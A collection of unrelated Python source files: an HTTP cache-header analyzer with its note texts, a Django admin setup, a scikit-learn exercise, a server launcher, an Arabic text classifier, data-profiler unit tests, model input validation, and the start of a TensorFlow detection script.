response.add_note('header-cache-control', CC_DUP, cc=cc)
# Who can store this?
if request and request.method not in cacheable_methods:
response.store_shared = response.store_private = False
request.add_note('method', METHOD_UNCACHEABLE, method=request.method)
return # bail; nothing else to see here
elif 'no-store' in cc_keys:
response.store_shared = response.store_private = False
response.add_note('header-cache-control', NO_STORE)
return # bail; nothing else to see here
elif 'private' in cc_keys:
response.store_shared = False
response.store_private = True
response.add_note('header-cache-control', PRIVATE_CC)
elif request and 'authorization' in [k.lower() for k, v in request.headers] \
and 'public' not in cc_keys:
response.store_shared = False
response.store_private = True
response.add_note('header-cache-control', PRIVATE_AUTH)
else:
response.store_shared = response.store_private = True
response.add_note('header-cache-control', STOREABLE)
# no-cache?
if 'no-cache' in cc_keys:
if lm_hdr is None and etag_hdr is None:
response.add_note('header-cache-control', NO_CACHE_NO_VALIDATOR)
else:
response.add_note('header-cache-control', NO_CACHE)
return
# pre-check / post-check
if 'pre-check' in cc_keys or 'post-check' in cc_keys:
if 'pre-check' not in cc_keys or 'post-check' not in cc_keys:
response.add_note('header-cache-control', CHECK_SINGLE)
else:
pre_check = post_check = None
try:
pre_check = int(cc_dict['pre-check'])
post_check = int(cc_dict['post-check'])
except ValueError:
response.add_note('header-cache-control', CHECK_NOT_INTEGER)
if pre_check is not None and post_check is not None:
if pre_check == 0 and post_check == 0:
response.add_note('header-cache-control', CHECK_ALL_ZERO)
elif post_check > pre_check:
response.add_note('header-cache-control', CHECK_POST_BIGGER)
post_check = pre_check
elif post_check == 0:
response.add_note('header-cache-control', CHECK_POST_ZERO)
else:
response.add_note('header-cache-control', CHECK_POST_PRE,
pre_check=pre_check, post_check=post_check)
# vary?
vary = response.parsed_headers.get('vary', set())
if "*" in vary:
response.add_note('header-vary', VARY_ASTERISK)
return # bail; nothing else to see here
elif len(vary) > 3:
response.add_note('header-vary', VARY_COMPLEX, vary_count=f_num(len(vary)))
else:
if "user-agent" in vary:
response.add_note('header-vary', VARY_USER_AGENT)
if "host" in vary:
response.add_note('header-vary', VARY_HOST)
# calculate age
response.age = age_hdr or 0
age_str = relative_time(response.age, 0, 0)
if date_hdr and date_hdr > 0:
apparent_age = max(0, int(response.start_time - date_hdr))
else:
apparent_age = 0
current_age = max(apparent_age, response.age)
current_age_str = relative_time(current_age, 0, 0)
if response.age >= 1:
response.add_note('header-age header-date', CURRENT_AGE, age=age_str)
# Check for clock skew and dateless origin server.
if not date_hdr:
response.add_note('', DATE_CLOCKLESS)
if expires_hdr or lm_hdr:
response.add_note('header-expires header-last-modified', DATE_CLOCKLESS_BAD_HDR)
else:
skew = date_hdr - response.start_time + (response.age)
if response.age > max_clock_skew and (current_age - skew) < max_clock_skew:
response.add_note('header-date header-age', AGE_PENALTY)
elif abs(skew) > max_clock_skew:
response.add_note('header-date', DATE_INCORRECT,
clock_skew_string=relative_time(skew, 0, 2))
else:
response.add_note('header-date', DATE_CORRECT)
# calculate freshness
freshness_lifetime = 0
has_explicit_freshness = False
has_cc_freshness = False
freshness_hdrs = ['header-date']
if 's-maxage' in cc_keys:
freshness_lifetime = cc_dict['s-maxage']
freshness_hdrs.append('header-cache-control')
has_explicit_freshness = True
has_cc_freshness = True
elif 'max-age' in cc_keys:
freshness_lifetime = cc_dict['max-age']
freshness_hdrs.append('header-cache-control')
has_explicit_freshness = True
has_cc_freshness = True
elif 'expires' in response.parsed_headers:
# An invalid Expires header means it's automatically stale
has_explicit_freshness = True
freshness_hdrs.append('header-expires')
freshness_lifetime = (expires_hdr or 0) - (date_hdr or int(response.start_time))
freshness_left = freshness_lifetime - current_age
freshness_left_str = relative_time(abs(int(freshness_left)), 0, 0)
freshness_lifetime_str = relative_time(int(freshness_lifetime), 0, 0)
response.freshness_lifetime = freshness_lifetime
fresh = freshness_left > 0
if has_explicit_freshness:
if fresh:
response.add_note(" ".join(freshness_hdrs), FRESHNESS_FRESH,
freshness_lifetime=freshness_lifetime_str,
freshness_left=freshness_left_str,
current_age=current_age_str)
elif has_cc_freshness and response.age > freshness_lifetime:
response.add_note(" ".join(freshness_hdrs), FRESHNESS_STALE_CACHE,
freshness_lifetime=freshness_lifetime_str,
freshness_left=freshness_left_str,
current_age=current_age_str)
else:
response.add_note(" ".join(freshness_hdrs), FRESHNESS_STALE_ALREADY,
freshness_lifetime=freshness_lifetime_str,
freshness_left=freshness_left_str,
current_age=current_age_str)
# can heuristic freshness be used?
elif response.status_code in heuristic_cacheable_status:
response.add_note('header-last-modified', FRESHNESS_HEURISTIC)
else:
response.add_note('', FRESHNESS_NONE)
# can stale responses be served?
if 'must-revalidate' in cc_keys:
if fresh:
response.add_note('header-cache-control', FRESH_MUST_REVALIDATE)
elif has_explicit_freshness:
response.add_note('header-cache-control', STALE_MUST_REVALIDATE)
elif 'proxy-revalidate' in cc_keys or 's-maxage' in cc_keys:
if fresh:
response.add_note('header-cache-control', FRESH_PROXY_REVALIDATE)
elif has_explicit_freshness:
response.add_note('header-cache-control', STALE_PROXY_REVALIDATE)
else:
if fresh:
response.add_note('header-cache-control', FRESH_SERVABLE)
elif has_explicit_freshness:
response.add_note('header-cache-control', STALE_SERVABLE)
# public?
if 'public' in cc_keys: # TODO: check for authentication in request
response.add_note('header-cache-control', PUBLIC)
class LM_FUTURE(Note):
category = categories.CACHING
level = levels.BAD
summary = "The Last-Modified time is in the future."
text = """\
The `Last-Modified` header indicates the last point in time that the resource has changed.
%(response)s's `Last-Modified` time is in the future, which doesn't have any defined meaning in
HTTP."""
class LM_PRESENT(Note):
category = categories.CACHING
level = levels.INFO
summary = "The resource last changed %(last_modified_string)s."
text = """\
The `Last-Modified` header indicates the last point in time that the resource has changed. It is
used in HTTP for validating cached responses, and for calculating heuristic freshness in caches.
This resource last changed %(last_modified_string)s."""
class METHOD_UNCACHEABLE(Note):
category = categories.CACHING
level = levels.INFO
summary = "Responses to the %(method)s method can't be stored by caches."
text = """\
"""
class CC_MISCAP(Note):
category = categories.CACHING
level = levels.WARN
summary = "The %(cc)s Cache-Control directive appears to have incorrect \
capitalisation."
text = """\
Cache-Control directive names are case-sensitive, and will not be recognised by most
implementations if the capitalisation is wrong.
Did you mean to use %(cc_lower)s instead of %(cc)s?"""
class CC_DUP(Note):
category = categories.CACHING
level = levels.WARN
summary = "The %(cc)s Cache-Control directive appears more than once."
text = """\
The %(cc)s Cache-Control directive is only defined to appear once; it is used more than once here,
so implementations may use different instances (e.g., the first, or the last), making their
behaviour unpredictable."""
class NO_STORE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s can't be stored by a cache."
text = """\
The `Cache-Control: no-store` directive indicates that this response can't be stored by a cache."""
class PRIVATE_CC(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s only allows a private cache to store it."
text = """\
The `Cache-Control: private` directive indicates that the response can only be stored by caches
that are specific to a single user; for example, a browser cache. Shared caches, such as those in
proxies, cannot store it."""
class PRIVATE_AUTH(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s only allows a private cache to store it."
text = """\
Because the request was authenticated and this response doesn't contain a `Cache-Control: public`
directive, this response can only be stored by caches that are specific to a single user; for
example, a browser cache. Shared caches, such as those in proxies, cannot store it."""
class STOREABLE(Note):
category = categories.CACHING
level = levels.INFO
summary = """\
%(response)s allows all caches to store it."""
text = """\
A cache can store this response; it may or may not be able to use it to satisfy a particular
request."""
class NO_CACHE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served from cache without validation."
text = """\
The `Cache-Control: no-cache` directive means that while caches **can** store this
response, they cannot use it to satisfy a request unless it has been validated (either with an
`If-None-Match` or `If-Modified-Since` conditional) for that request."""
class NO_CACHE_NO_VALIDATOR(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served from cache without validation."
text = """\
The `Cache-Control: no-cache` directive means that while caches **can** store this response, they
cannot use it to satisfy a request unless it has been validated (either with an `If-None-Match` or
`If-Modified-Since` conditional) for that request.
%(response)s doesn't have a `Last-Modified` or `ETag` header, so it effectively can't be used by a
cache."""
class VARY_ASTERISK(Note):
category = categories.CACHING
level = levels.WARN
summary = "Vary: * effectively makes this response uncacheable."
text = """\
`Vary *` indicates that responses for this resource vary by some aspect that can't (or won't) be
described by the server. This makes this response effectively uncacheable."""
class VARY_USER_AGENT(Note):
category = categories.CACHING
level = levels.INFO
summary = "Vary: User-Agent can cause cache inefficiency."
text = """\
Sending `Vary: User-Agent` requires caches to store a separate copy of the response for every
`User-Agent` request header they see.
Since there are so many different `User-Agent`s, this can "bloat" caches with many copies of the
same thing, or cause them to give up on storing these responses at all.
Consider having different URIs for the various versions of your content instead; this will give
finer control over caching without sacrificing efficiency."""
class VARY_HOST(Note):
category = categories.CACHING
level = levels.WARN
summary = "Vary: Host is not necessary."
text = """\
Some servers (e.g., [Apache](http://httpd.apache.org/) with
[mod_rewrite](http://httpd.apache.org/docs/2.4/mod/mod_rewrite.html)) will send `Host` in the
`Vary` header, in the belief that since it affects how the server selects what to send back, this
is necessary.
This is not the case; HTTP specifies that the URI is the basis of the cache key, and the URI
incorporates the `Host` header.
The presence of `Vary: Host` may make some caches not store an otherwise cacheable response (since
some cache implementations will not store anything that has a `Vary` header)."""
class VARY_COMPLEX(Note):
category = categories.CACHING
level = levels.WARN
summary = "This resource varies in %(vary_count)s ways."
text = """\
The `Vary` mechanism allows a resource to describe the dimensions that its responses vary, or
change, over; each listed header is another dimension.
Varying by too many dimensions makes using this information impractical."""
class PUBLIC(Note):
category = categories.CACHING
level = levels.WARN
summary = "Cache-Control: public is rarely necessary."
text = """\
The `Cache-Control: public` directive makes a response cacheable even when the request had an
`Authorization` header (i.e., HTTP authentication was in use).
Therefore, HTTP-authenticated (NOT cookie-authenticated) resources _may_ have use for `public` to
improve cacheability, if used judiciously.
However, other responses **do not need to contain `public`**; it does not make the
response "more cacheable", and only makes the response headers larger."""
class CURRENT_AGE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s has been cached for %(age)s."
text = """\
The `Age` header indicates the age of the response; i.e., how long it has been cached since it was
generated. HTTP takes this as well as any apparent clock skew into account in computing how old the
response already is."""
class FRESHNESS_FRESH(Note):
category = categories.CACHING
level = levels.GOOD
summary = "%(response)s is fresh until %(freshness_left)s from now."
text = """\
A response can be considered fresh when its age (here, %(current_age)s) is less than its freshness
lifetime (in this case, %(freshness_lifetime)s)."""
class FRESHNESS_STALE_CACHE(Note):
category = categories.CACHING
level = levels.WARN
summary = "%(response)s has been served stale by a cache."
text = """\
An HTTP response is stale when its age (here, %(current_age)s) is equal to or exceeds its freshness
lifetime (in this case, %(freshness_lifetime)s).
HTTP allows caches to use stale responses to satisfy requests only under exceptional circumstances;
e.g., when they lose contact with the origin server. Either that has happened here, or the cache
has ignored the response's freshness directives."""
class FRESHNESS_STALE_ALREADY(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s is already stale."
text = """\
A cache considers a HTTP response stale when its age (here, %(current_age)s) is equal to or exceeds
its freshness lifetime (in this case, %(freshness_lifetime)s).
HTTP allows caches to use stale responses to satisfy requests only under exceptional circumstances;
e.g., when they lose contact with the origin server."""
class FRESHNESS_HEURISTIC(Note):
category = categories.CACHING
level = levels.WARN
summary = "%(response)s allows a cache to assign its own freshness lifetime."
text = """\
When responses with certain status codes don't have explicit freshness information (like a `
Cache-Control: max-age` directive, or `Expires` header), caches are allowed to estimate how fresh
it is using a heuristic.
Usually, but not always, this is done using the `Last-Modified` header. For example, if your
response was last modified a week ago, a cache might decide to consider the response fresh for a
day.
Consider adding a `Cache-Control` header; otherwise, it may be cached for longer or shorter than
you'd like."""
class FRESHNESS_NONE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s can only be served by a cache under exceptional circumstances."
text = """\
%(response)s doesn't have explicit freshness information (like a ` Cache-Control: max-age`
directive, or `Expires` header), and this status code doesn't allow caches to calculate their own.
Therefore, while caches may be allowed to store it, they can't use it, except in unusual
cirucumstances, such a when the origin server can't be contacted.
This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive.
Note that many caches will not store the response at all, because it is not generally useful to do
so."""
class FRESH_SERVABLE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s may still be served by a cache once it becomes stale."
text = """\
HTTP allows stale responses to be served under some circumstances; for example, if the origin
server can't be contacted, a stale response can be used (even if it doesn't have explicit freshness
information).
This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive."""
class STALE_SERVABLE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s might be served by a cache, even though it is stale."
text = """\
HTTP allows stale responses to be served under some circumstances; for example, if the origin
server can't be contacted, a stale response can be used (even if it doesn't have explicit freshness
information).
This behaviour can be prevented by using the `Cache-Control: must-revalidate` response directive."""
class FRESH_MUST_REVALIDATE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served by a cache once it becomes stale."
text = """\
The `Cache-Control: must-revalidate` directive forbids caches from using stale responses to satisfy
requests.
For example, caches often use stale responses when they cannot connect to the origin server; when
this directive is present, they will return an error rather than a stale response."""
class STALE_MUST_REVALIDATE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served by a cache, because it is stale."
text = """\
The `Cache-Control: must-revalidate` directive forbids caches from using stale responses to satisfy
requests.
For example, caches often use stale responses when they cannot connect to the origin server; when
this directive is present, they will return an error rather than a stale response."""
class FRESH_PROXY_REVALIDATE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served by a shared cache once it becomes stale."
text = """\
The presence of the `Cache-Control: proxy-revalidate` and/or `s-maxage` directives forbids shared
caches (e.g., proxy caches) from using stale responses to satisfy requests.
For example, caches often use stale responses when they cannot connect to the origin server; when
this directive is present, they will return an error rather than a stale response.
These directives do not affect private caches; for example, those in browsers."""
class STALE_PROXY_REVALIDATE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s cannot be served by a shared cache, because it is stale."
text = """\
The presence of the `Cache-Control: proxy-revalidate` and/or `s-maxage` directives forbids shared
caches (e.g., proxy caches) from using stale responses to satisfy requests.
For example, caches often use stale responses when they cannot connect to the origin server; when
this directive is present, they will return an error rather than a stale response.
These directives do not affect private caches; for example, those in browsers."""
class CHECK_SINGLE(Note):
category = categories.CACHING
level = levels.WARN
summary = "Only one of the pre-check and post-check Cache-Control directives is present."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
%(response)s uses only one of these directives; as a result, Internet Explorer will ignore the
directive, since it requires both to be present.
See [this blog entry](http://bit.ly/rzT0um) for more information.
"""
class CHECK_NOT_INTEGER(Note):
category = categories.CACHING
level = levels.WARN
summary = "One of the pre-check/post-check Cache-Control directives has a non-integer value."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
Their values are required to be integers, but here at least one is not. As a result, Internet
Explorer will ignore the directive.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class CHECK_ALL_ZERO(Note):
category = categories.CACHING
level = levels.WARN
summary = "The pre-check and post-check Cache-Control directives are both '0'."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
%(response)s gives a value of "0" for both; as a result, Internet Explorer will ignore the
directive, since it requires both to be present.
In other words, setting these to zero has **no effect** (besides wasting bandwidth),
and may trigger bugs in some beta versions of IE.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class CHECK_POST_BIGGER(Note):
category = categories.CACHING
level = levels.WARN
summary = "The post-check Cache-control directive's value is larger than pre-check's."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
%(response)s assigns a higher value to `post-check` than to `pre-check`; this means that Internet
Explorer will treat `post-check` as if its value is the same as `pre-check`'s.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class CHECK_POST_ZERO(Note):
category = categories.CACHING
level = levels.BAD
summary = "The post-check Cache-control directive's value is '0'."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
%(response)s assigns a value of "0" to `post-check`, which means that Internet Explorer will reload
the content as soon as it enters the browser cache, effectively **doubling the load on the server**.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class CHECK_POST_PRE(Note):
category = categories.CACHING
level = levels.INFO
summary = "%(response)s may be refreshed in the background by Internet Explorer."
text = """\
Microsoft Internet Explorer implements two `Cache-Control` extensions, `pre-check` and
`post-check`, to give more control over how its cache stores responses.
Once it has been cached for more than %(post_check)s seconds, a new request will result in the
cached response being served while it is refreshed in the background. However, if it has been
cached for more than %(pre_check)s seconds, the browser will download a fresh response before
showing it to the user.
Note that these directives do not have any effect on other clients or caches.
See [this blog entry](http://bit.ly/rzT0um) for more information."""
class DATE_CORRECT(Note):
category = categories.GENERAL
level = levels.GOOD
summary = "The server's clock is correct."
text = """\
HTTP's caching model assumes reasonable synchronisation between clocks on the server and client;
using RED's local clock, the server's clock appears to be well-synchronised."""
class DATE_INCORRECT(Note):
category = categories.GENERAL
level = levels.BAD
summary = "The server's clock is %(clock_skew_string)s."
text = """\
Using RED's local clock, the server's clock does not appear to be well-synchronised.
HTTP's caching model assumes reasonable synchronisation between clocks on the server and client;
clock skew can cause responses that should be cacheable to be considered uncacheable (especially if
their freshness lifetime is short).
Ask your server administrator to synchronise the clock, e.g., using
[NTP](http://en.wikipedia.org/wiki/Network_Time_Protocol Network Time Protocol).
Apparent clock skew can also be caused by caching the response without adjusting the `Age` header;
e.g., in a reverse proxy or Content Delivery network. See [this
paper](http://www2.research.att.com/~edith/Papers/HTML/usits01/index.html) for more information. """
class AGE_PENALTY(Note):
category = categories.GENERAL
level = levels.WARN
summary = "It appears that the Date header has been changed by an intermediary."
text = """\
It appears that this response has been cached by a reverse proxy or Content Delivery Network,
because the `Age` header is present, but the `Date` header is more recent than it indicates.
Generally, reverse proxies should either omit the `Age` header (if they have another means of
determining how fresh the response is), or leave the `Date` header alone (i.e., act as a normal
HTTP cache).
See [this paper](http://j.mp/S7lPL4) for more information."""
class DATE_CLOCKLESS(Note):
category = categories.GENERAL
level = levels.WARN
summary = "%(response)s doesn't have a Date header."
text = """\
Although HTTP allowes a server not to send a `Date` header if it doesn't have a local clock, this
can make calculation of the response's age inexact."""
class DATE_CLOCKLESS_BAD_HDR(Note):
category = categories.CACHING
level = levels.BAD
summary = "Responses without a Date aren't allowed to have Expires or Last-Modified values."
text = """\
Because both the `Expires` and `Last-Modified` headers are date-based, it's necessary to know when
the message was generated for them to be useful; otherwise, clock drift, transit times between
nodes as well as caching could skew their application."""
|
StarcoderdataPython
|
11235037
|
<reponame>study-abacus/admin-site
from django.contrib import admin
from .models import Student, Course, Fee, Achievement, CI
# Register your models here.
admin.site.register(Student)
admin.site.register(Course)
admin.site.register(Fee)
admin.site.register(Achievement)
admin.site.register(CI)
|
StarcoderdataPython
|
9786662
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.11.5
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# %% [markdown]
# # 📝 Exercise M4.05
# In the previous notebook we set `penalty="none"` to disable regularization
# entirely. This parameter can also control the **type** of regularization to use,
# whereas the regularization **strength** is set using the parameter `C`.
# Setting`penalty="none"` is equivalent to an infinitely large value of `C`.
# In this exercise, we ask you to train a logistic regression classifier using the
# `penalty="l2"` regularization (which happens to be the default in scikit-learn)
# to find by yourself the effect of the parameter `C`.
#
# We will start by loading the dataset and create the helper function to show
# the decision separation as in the previous code.
# %% [markdown]
# ```{note}
# If you want a deeper overview regarding this dataset, you can refer to the
# Appendix - Datasets description section at the end of this MOOC.
# ```
# %%
import pandas as pd
penguins = pd.read_csv("../datasets/penguins_classification.csv")
# only keep the Adelie and Chinstrap classes
penguins = penguins.set_index("Species").loc[
["Adelie", "Chinstrap"]].reset_index()
culmen_columns = ["Culmen Length (mm)", "Culmen Depth (mm)"]
target_column = "Species"
# %%
from sklearn.model_selection import train_test_split
penguins_train, penguins_test = train_test_split(penguins, random_state=0)
data_train = penguins_train[culmen_columns]
data_test = penguins_test[culmen_columns]
target_train = penguins_train[target_column]
target_test = penguins_test[target_column]
# %% [markdown]
# First, let's create our predictive model.
# %%
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
logistic_regression = make_pipeline(
StandardScaler(), LogisticRegression(penalty="l2"))
# %% [markdown]
# Given the following candidates for the `C` parameter, find out the impact of
# `C` on the classifier decision boundary. You can import the helper class with
# `from helpers.plotting import DecisionBoundaryDisplay` to plot the decision
# function boundary. Use the method `from_estimator` from this class.
# %%
Cs = [0.01, 0.1, 1, 10]
# Write your code here.
# %% [markdown]
# Look at the impact of the `C` hyperparameter on the magnitude of the weights.
# %%
# Write your code here.
|
StarcoderdataPython
|
317743
|
from werkzeug.serving import run_simple
from webapp import create_app
import sys
from os import path
if __name__ == '__main__':
project_dp = path.dirname(path.dirname(path.realpath(__file__)))
sys.path.append(path.join(project_dp)) # to find any local resolvers
app = create_app(config_file_path='/opt/loris/etc/loris2.conf')
run_simple('0.0.0.0', 5004, app, use_debugger=False, use_reloader=False)
|
StarcoderdataPython
|
3290371
|
"""TODO"""
import pandas
import nltk
nltk.download('punkt') # skip if already downloaded
from sklearn.cross_validation import train_test_split
from textblob.classifiers import NaiveBayesClassifier
from arcode import anycode, clean_str
class XcLassify(object):
"""TODO"""
def __init__(self):
self.__cl = None
self.__traindata = None
self.__testdata = None
def _fetch_clean(self, filepath):
"""TODO"""
dframe = pandas.read_excel(filepath)
dframe.iloc[:, 0] = dframe.iloc[:, 0].map(clean_str)
dframe.iloc[:, 0] = dframe.iloc[:, 0].map(anycode)
return dframe.iloc[:, 0:2].to_records(index=False).tolist()
def _split_data(self, datalist, test_ratio):
"""TODO"""
self.__traindata, self.__testdata = train_test_split(datalist, test_size=test_ratio)
return self.__traindata, self.__testdata
def data_from_excel(self, filepath, test_ratio=0.24):
datalist = self._fetch_clean(filepath)
return self._split_data(datalist, 0.2)
def train(self, update=False, new_data=None):
"""TODO"""
if update and new_data:
self.__cl.update(new_data)
else:
self.__cl = NaiveBayesClassifier(self.__traindata)
def classify(self, text):
"""TODO"""
text = clean_str(text, post_func=anycode)
return self.__cl.classify(text)
def benchmark(self, show_best_features=False):
"""TODO"""
print('\nAccuracy: %0.3f\n' % self.__cl.accuracy(self.__testdata))
if show_best_features:
self.__cl.show_informative_features()
# test area
if __name__ == '__main__':
XCL = XcLassify()
XCL.data_from_excel('data/data_sample.xlsx')
XCL.train()
print(XCL.classify("الباقة خلصت وسحب من الرصيد بدون اخطار قبلها!"))
print(XCL.classify("ازاى اجدد باقة النت قبل ميعادها؟"))
print(XCL.classify("لو سمحت عاوز اقدم شكوى فى الفرع"))
XCL.benchmark(show_best_features=True)
else:
pass
|
StarcoderdataPython
|
8067997
|
import unittest
from unittest import mock
from collections import defaultdict
import pandas as pd
from data_profiler.profilers.unstructured_data_labeler_column_profile import UnstructuredDataLabelerProfile
class TestUnstructuredDataLabelerProfile(unittest.TestCase):
def test_char_level_counts(self):
# setting up objects/profile
default = UnstructuredDataLabelerProfile()
sample = pd.Series(["abc123", "Bob", "!@##$%"])
# running update
default.update(sample)
# now getting entity_counts to check for proper structure
self.assertEqual(
{'DATETIME': 6, 'BACKGROUND': 3, 'QUANTITY': 6},
default.profile["entity_counts"]["true_char_level"])
self.assertEqual(
{'DATETIME': 6, 'BACKGROUND': 3, 'QUANTITY': 6},
default.profile["entity_counts"]["postprocess_char_level"],)
# assert it's not empty for now
self.assertIsNotNone(default.profile)
# then assert that correctly counted number of char samples
self.assertEqual(default.char_sample_size, 15)
def test_advanced_sample(self):
# setting up objects/profile
default = UnstructuredDataLabelerProfile()
sample = pd.Series(
["Help\t<NAME>\tneeds\tfood.\tPlease\tCall\t555-301-1234."
"\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000043219499392912."
"\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"])
# running update
default.update(sample)
# now getting entity_counts to check for proper structure
self.assertEqual(
{'BACKGROUND': 106, 'PERSON': 8, 'PHONE_NUMBER': 12, 'SSN': 20,
'BAN': 18, 'INTEGER': 3, 'ADDRESS': 3},
default.profile["entity_counts"]["true_char_level"])
# assert it's not empty for now
self.assertIsNotNone(default.profile)
def test_word_level_NER_label_counts(self):
# setting up objects/profile
default = UnstructuredDataLabelerProfile()
sample = pd.Series(
["Help\tJohn Macklemore\tneeds\tfood.\tPlease\tCall\t555-301-1234."
"\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000049939232194912."
"\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"])
# running update
default.update(sample)
# now getting entity_counts to check for proper structure
self.assertEqual(
{'BACKGROUND': 23,'PHONE_NUMBER': 1, 'SSN': 2, 'BAN': 1},
default.profile["entity_counts"]["word_level"])
# assert it's not empty for now
self.assertIsNotNone(default.profile)
def test_statistics(self):
# setting up objects/profile
default = UnstructuredDataLabelerProfile()
sample = pd.Series(
["Help\tJohn Macklemore\tneeds\tfood.\tPlease\tCall\t555-301-1234."
"\tHis\tssn\tis\tnot\t334-97-1234. I'm a BAN: 000043219499392912."
"\n", "Hi my name is joe, \t SSN: 123456789 r@nd0m numb3rz!\n"])
background_word_level_percent = 0.85185
background_true_char_level_percent = 0.62352
background_postprocess_level_percent = 0.705882
# running update
default.update(sample)
self.assertAlmostEqual(
background_word_level_percent,
default.entity_percentages['word_level']['BACKGROUND'],
3)
self.assertAlmostEqual(
background_true_char_level_percent,
default.entity_percentages['true_char_level']['BACKGROUND'],
3)
self.assertAlmostEqual(
background_postprocess_level_percent,
default.entity_percentages['postprocess_char_level']['BACKGROUND'],
3)
self.assertEqual(27, default.word_sample_size)
self.assertEqual(170, default.char_sample_size)
self.assertEqual(
23, default.entity_counts['word_level']['BACKGROUND'])
self.assertEqual(
106, default.entity_counts['true_char_level']['BACKGROUND'])
self.assertEqual(
120, default.entity_counts['postprocess_char_level']['BACKGROUND'])
self.assertIsNone(default._get_percentages('WRONG_INPUT'))
default.update(sample)
self.assertEqual(54, default.word_sample_size)
self.assertEqual(340, default.char_sample_size)
@mock.patch('data_profiler.profilers.'
'unstructured_data_labeler_column_profile.DataLabeler')
@mock.patch('data_profiler.profilers.'
'unstructured_data_labeler_column_profile.'
'CharPostprocessor')
def test_profile(self, processor_class_mock, model_class_mock):
# setup mocks
model_mock = mock.Mock()
model_mock.reverse_label_mapping = {1: 'BACKGROUND'}
model_mock.predict.return_value = dict(pred=[[1]])
model_class_mock.return_value = model_mock
processor_mock = mock.Mock()
processor_mock.process.return_value = dict(pred=[[]])
processor_class_mock.return_value = processor_mock
# initialize labeler profile
default = UnstructuredDataLabelerProfile()
sample = pd.Series(["a"])
expected_profile = dict(
entity_counts={
'postprocess_char_level': defaultdict(int, {'BACKGROUND': 1}),
'true_char_level': defaultdict(int, {'BACKGROUND': 1}),
'word_level': defaultdict(int)
},
times=defaultdict(float, {'data_labeler_predict': 1.0})
)
time_array = [float(i) for i in range(4, 0, -1)]
with mock.patch('time.time', side_effect=lambda: time_array.pop()):
default.update(sample)
profile = default.profile
# key and value populated correctly
self.assertDictEqual(expected_profile, profile)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
6555466
|
import numpy as np
import pandas as pd
from pydantic import ValidationError
from regression_model.config.core import config
from regression_model.processing.schemas import MultipleHouseDataInputs
def drop_na_inputs(*, input_data: pd.DataFrame) -> pd.DataFrame:
"""Check model inputs for na values and filter."""
# Columns in train data with missing values
train_vars_with_na = (
config.model_config.categorical_vars_with_na_frequent
+ config.model_config.categorical_vars_with_na_missing
+ config.model_config.numerical_vars_with_na
)
# At least one example in column var is missing
new_vars_with_na = [
var
for var in config.model_config.features
if var not in train_vars_with_na and input_data[var].isnull().sum() > 0
]
# Drop rows
return input_data.dropna(axis=0, subset=new_vars_with_na)
def validate_inputs(*, input_data: pd.DataFrame) -> pd.DataFrame:
"""Check model inputs for unprocessable values."""
selected_features = config.model_config.features
validated_data = input_data.rename(columns=config.model_config.variables_to_rename)
validated_data = validated_data[selected_features].copy()
validated_data = drop_na_inputs(input_data=validated_data)
validated_data["MSSubClass"] = validated_data["MSSubClass"].astype("O")
errors = None
try:
# Replace numpy nans so that pydantic can validate
MultipleHouseDataInputs(
inputs=validated_data.replace({np.nan: None}).to_dict(orient="records")
)
except ValidationError as e:
errors = e.json()
return validated_data, errors
|
StarcoderdataPython
|
12836019
|
# Copyright 2017 Tensorflow. All Rights Reserved.
# Modifications copyright 2018 <NAME>/<NAME> & <NAME>
# We follow the object detection API of Tensorflow
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import csv
import numpy as np
import tensorflow as tf
import _init_paths
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
from object_detection.utils import metrics
from object_detection.utils import object_detection_evaluation as obj_eval
from object_detection.core import standard_fields
from skvideo.io import FFmpegWriter
from skimage.io import imread
tf.app.flags.DEFINE_string('gt_dir', '', 'Location of root directory for the '
'ground truth data. Folder structure is assumed to be:'
